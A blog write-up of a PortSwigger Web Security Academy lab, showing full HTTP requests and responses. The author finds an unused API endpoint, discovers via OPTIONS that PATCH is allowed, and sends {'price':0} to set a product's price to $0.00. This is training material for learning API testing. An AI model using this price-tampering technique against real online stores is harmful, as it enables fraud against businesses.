Skip to content

chojnowski.it

Port Swigger Finding and exploiting an unused API

Port Swigger Finding and exploiting an unused API

Finding and exploiting an unused API endpoint¶

https://portswigger.net/web-security/learning-paths/api-testing/api-testing-identifying-and-interacting-with-api-endpoints/api-testing/lab-exploiting-unused-api-endpoint

https://0ac100e0039a058a81b7981800a600a1.web-security-academy.net/my-account?id=wiener

Request GET¶

Get info about product
---
* Request
GET /api/products/1/price HTTP/2
Host: 0ac100e0039a058a81b7981800a600a1.web-security-academy.net
Cookie: session=Zh9RUpHFvshFtu9ykgEqRgY24nxPWZfe
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0ac100e0039a058a81b7981800a600a1.web-security-academy.net/product?productId=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
---
* Response
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 91

{"price":"$1337.00","message":"Your neighbor just bought 2 of these! Don't feel left out!"}

Get info about allowed methods¶

Method: OPTIONS
I see two metods are allowed: GET, PATCH
---
Request
OPTIONS /api/products/1/price HTTP/2
Host: 0ac100e0039a058a81b7981800a600a1.web-security-academy.net
Cookie: session=Zh9RUpHFvshFtu9ykgEqRgY24nxPWZfe
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0ac100e0039a058a81b7981800a600a1.web-security-academy.net/product?productId=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
---
* Response
HTTP/2 405 Method Not Allowed
Allow: GET, PATCH
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 20

"Method Not Allowed"

Change prince for product¶

Add two things:
- Content-Type: application/json
- {"price":0}
---
* Request
PATCH /api/products/1/price HTTP/2
Host: 0ac100e0039a058a81b7981800a600a1.web-security-academy.net
Cookie: session=Zh9RUpHFvshFtu9ykgEqRgY24nxPWZfe
Content-Type: application/json
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0ac100e0039a058a81b7981800a600a1.web-security-academy.net/product?productId=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Content-Length: 11

{"price":0}
---
* Response
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 17

{"price":"$0.00"}

Verify on website - price: $0.00¶

https://0ac100e0039a058a81b7981800a600a1.web-security-academy.net/product?productId=1

Check cart¶

https://0ac100e0039a058a81b7981800a600a1.web-security-academy.net/cart

Solved¶

https://0ac100e0039a058a81b7981800a600a1.web-security-academy.net/cart/order-confirmation?order-confirmed=true